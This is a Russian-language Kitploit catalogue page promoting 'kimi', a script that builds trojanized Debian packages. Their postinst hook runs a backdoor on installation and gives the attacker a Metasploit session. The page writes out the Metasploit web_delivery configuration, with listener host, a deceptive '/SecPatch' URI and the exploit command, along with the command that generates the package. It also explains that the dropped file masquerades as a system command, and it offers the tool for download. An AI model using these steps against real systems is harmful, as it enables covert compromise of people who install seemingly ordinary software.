Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
kimi — Script to generate malicious debian packages (debain trojans). | Kitploit
Инструменты/GitHubGitHub/chaitanyaharitash/kimi
Фреймворки для эксплойтовГенерация полезной нагрузкиПост-эксплуатацияАнализ вредоносных программТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubchaitanyaharitash/kimi

kimi

Script to generate malicious debian packages (debain trojans).

Репозиторий
1235467 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

kimi - Генератор вредоносных Debian-пакетов

Скрипт для генерации вредоносных debian-пакетов (debian-троянов).

О программе, преимущества, использование, тестирование :::

root@kitploit:~
Kimi — имя, вдохновлённое "Кимимаро", одним из моих любимых персонажей аниме "Наруто".

Kimi — это скрипт, который генерирует вредоносный debian-пакет для metasploit,
содержащий bash-файл. Bash-файл развёртывается в каталоге "/usr/local/bin/".

Бэкдор выполняется, как только жертва пытается установить deb-пакет, благодаря файлу postinst.

Bash-файл внедряется и также выступает в роли некоторой системной команды, которую выполняет жертва,
а атакующий получает сессию.

Преимущества :
-- Полная независимость. Пользователю не нужно устанавливать какой-либо создатель debian-пакетов.
-- Может быть легко интегрирован с любым генератором полезных нагрузок благодаря использованию аргументов (знаю, это слабо :P).

Kimi в основном зависит от модуля web_delivery, и всё автоматизировано.
Всё, что нужно атакующему, — выполнить следующие настройки:

Настройка Web_Delivery в msf:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Генерация вредоносной полезной нагрузки:

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

ПРИМЕЧАНИЕ :: Этот проект был создан для интеграции с Venom Shellcode Generator 1.0.13.
Его также можно использовать отдельно: всё, что нужно, — изменить uri-путь в переменных msf.
-------------------------------------------------------------------------------------

Тестировалось на:
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0
Скачать инструмент

Обновления :::

root@kitploit:~
[22 февраля 2017]
-- Добавлена функция создания файла "postinst" для автоматизации выполнения внедрённого вредоносного файла.
-- Добавлена функция генерации RC-файла для полной автоматизации с открытием обработчика — больше не нужно
   настраивать обработчик вручную.
-- Исправлены некоторые распространённые ошибки (особая благодарность r00t 3xp10it :)).

[12 октября 2017]
-- Добавлен аргумент командной строки (-a/--arch) для выбора архитектуры (i386/amd64).

[24 апреля 2019] - Тестовый выпуск.
-- Теперь можно задать пользовательский URI и LPORT.
-- Полезная нагрузка на Python обновлена для совместимости с Python 2/3 и последней версией Metasploit 5.
-- Весь код переработан, хотя он всё ещё поддерживает Python 2.7.

Скриншоты :::

Main Banner Kimi In Action

Разное :::

root@kitploit:~
   Запись в блоге     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   Видео на YouTube   : https://youtu.be/Dsn6BRHy9_w
   Образец на VirusTotal (потому что я видел нехорошее использование этого скрипта в дикой природе): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

Приветы :::

Suspicious Shell Activity [Red Team]

Вопросы? Оскорбления?

Twitter : @bofheaded